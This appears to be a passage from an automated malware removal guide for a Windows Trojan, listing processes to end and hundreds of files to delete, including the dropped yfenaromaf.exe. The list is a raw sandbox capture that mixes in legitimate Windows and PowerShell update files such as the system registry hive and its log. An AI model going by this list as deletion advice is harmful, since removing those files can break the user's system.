    WindowsXP-KB968930-x86-ENG.exe:3964
    new.exe:3064
    net1.exe:2460
    tasklist.exe:2264
    ngen.exe:3596
    ngen.exe:3168
    ngen.exe:3676
    ngen.exe:3300
    ngen.exe:856
    ngen.exe:2988
    ngen.exe:3172
    ngen.exe:1960
    ngen.exe:1944
    ngen.exe:420
    ngen.exe:916
    ngen.exe:3936
    ngen.exe:3996
    ngen.exe:1868
    ngen.exe:2188
    ngen.exe:2952
    ngen.exe:3560
    ngen.exe:3224
    ngen.exe:1724
    ngen.exe:3220
    ngen.exe:1976
    ngen.exe:2164
    ngen.exe:648
    update.exe:4040
    net.exe:2156
    net.exe:2224
    net.exe:2416
    hostname.exe:1384
    PSCustomSetupUtil.exe:620
    PSCustomSetupUtil.exe:452
    PSCustomSetupUtil.exe:3908
    PSCustomSetupUtil.exe:1924
    PSCustomSetupUtil.exe:2196
    PSCustomSetupUtil.exe:3064
    PSCustomSetupUtil.exe:2308
    PSCustomSetupUtil.exe:2224
    PSCustomSetupUtil.exe:3696
    PSCustomSetupUtil.exe:3856
    PSCustomSetupUtil.exe:2176
    PSCustomSetupUtil.exe:2244
    PSCustomSetupUtil.exe:2112
    PSCustomSetupUtil.exe:2240
    PSCustomSetupUtil.exe:3992
    PSCustomSetupUtil.exe:2288
    PSCustomSetupUtil.exe:2344
    PSCustomSetupUtil.exe:3952
    PSCustomSetupUtil.exe:2552
    PSCustomSetupUtil.exe:1496
    PSCustomSetupUtil.exe:264
    PSCustomSetupUtil.exe:1868
    PSCustomSetupUtil.exe:1284
    PSCustomSetupUtil.exe:2332
    PSCustomSetupUtil.exe:2556
    PSCustomSetupUtil.exe:2140
    ipconfig.exe:1240
    yfenaromaf.exe:1664
    PSSetupNativeUtils.exe:1932
    mscorsvw.exe:4008
    mscorsvw.exe:3128
    mscorsvw.exe:2592
    mscorsvw.exe:2732
    mscorsvw.exe:3104
    mscorsvw.exe:2284
    mscorsvw.exe:3484
    mscorsvw.exe:2168
    mscorsvw.exe:2072
    mscorsvw.exe:3084
    mscorsvw.exe:2408
    mscorsvw.exe:828
    regsvr32.exe:3404
    regsvr32.exe:3200
    wsmanhttpconfig.exe:3232
    wsmanhttpconfig.exe:1960
    netsh.exe:2304
    bindata865.exe:3088

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)
    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)
    C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
    C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
    C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
    C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
    C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
    C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
    C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
    C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
    C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
    C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
    C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
    C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
    C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
    C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
    C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
    C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
    C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
    C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
    C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
    C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
    C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
    C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
    C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
    C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
    C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
    C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
    C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
    C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
    C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
    C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
    C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
    C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
    C:\$Directory (800 bytes)
    C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
    C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
    C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
    C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
    C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
    C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
    C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
    C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
    C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
    C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
    C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
    C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
    C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
    C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
    C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
    C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
    C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
    C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
    C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
    C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
    C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
    C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
    C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
    C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
    C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
    C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
    C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
    C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
    C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
    C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
    C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
    C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
    C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
    C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
    C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
    C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
    C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
    C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
    C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
    C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
    C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
    C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
    C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
    C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
    C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
    C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
    C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
    C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
    C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
    C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)
    %System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
    %System%\SET12.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
    %System%\SET1B.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
    %WinDir%\inf\SET1D.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
    %System%\SET1A.tmp (789 bytes)
    %WinDir%\Help\SETCA.tmp (12287 bytes)
    %System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
    %WinDir%\SECD5.tmp (1897 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
    %System%\winrm\0409\SET22.tmp (601 bytes)
    %System%\SET36.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
    %System%\SET25.tmp (2 bytes)
    %System%\SET13.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
    %System%\SET14.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
    %WinDir%\inf\SET1E.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
    %System%\SET2A.tmp (1281 bytes)
    %System%\SETC4.tmp (42 bytes)
    %System%\SET19.tmp (25 bytes)
    %WinDir%\ntdtcsetup.log (22691 bytes)
    %WinDir%\inf\oem10.PNF (10040 bytes)
    %System%\SET2D.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
    %System%\SET33.tmp (25 bytes)
    %WinDir%\msmqinst.log (5398 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
    %System%\SETB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
    %System%\SET2B.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
    %System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
    %System%\SET2E.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
    %System%\SETE.tmp (673 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
    %System%\wbem\SET23.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\SET17.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\config\SYSTEM.LOG (5705 bytes)
    %System%\SET34.tmp (789 bytes)
    %System%\SET18.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
    %System%\SET27.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
    %System%\SET11.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
    %System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
    %System%\SET35.tmp (14 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SETF.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
    %System%\SET10.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
    %System%\SET26.tmp (35 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
    %System%\config\system (3251 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
    %System%\SET32.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
    %WinDir%\imsins.log (3792 bytes)
    %System%\wbem\SET9.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
    %System%\SET16.tmp (12 bytes)
    %System%\winrm\0409\SET3C.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
    %System%\CatRoot2\dberr.txt (1031 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
    %WinDir%\iis6.log (139812 bytes)
    %WinDir%\comsetup.log (49682 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
    %System%\SET28.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
    %System%\SET31.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
    %System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
    %System%\SET29.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
    %System%\SET2C.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
    %WinDir%\KB968930.log (245066 bytes)
    %System%\SET15.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\SET24.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
    %System%\SET1C.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
    %System%\SETD.tmp (1281 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\SETC.tmp (35 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
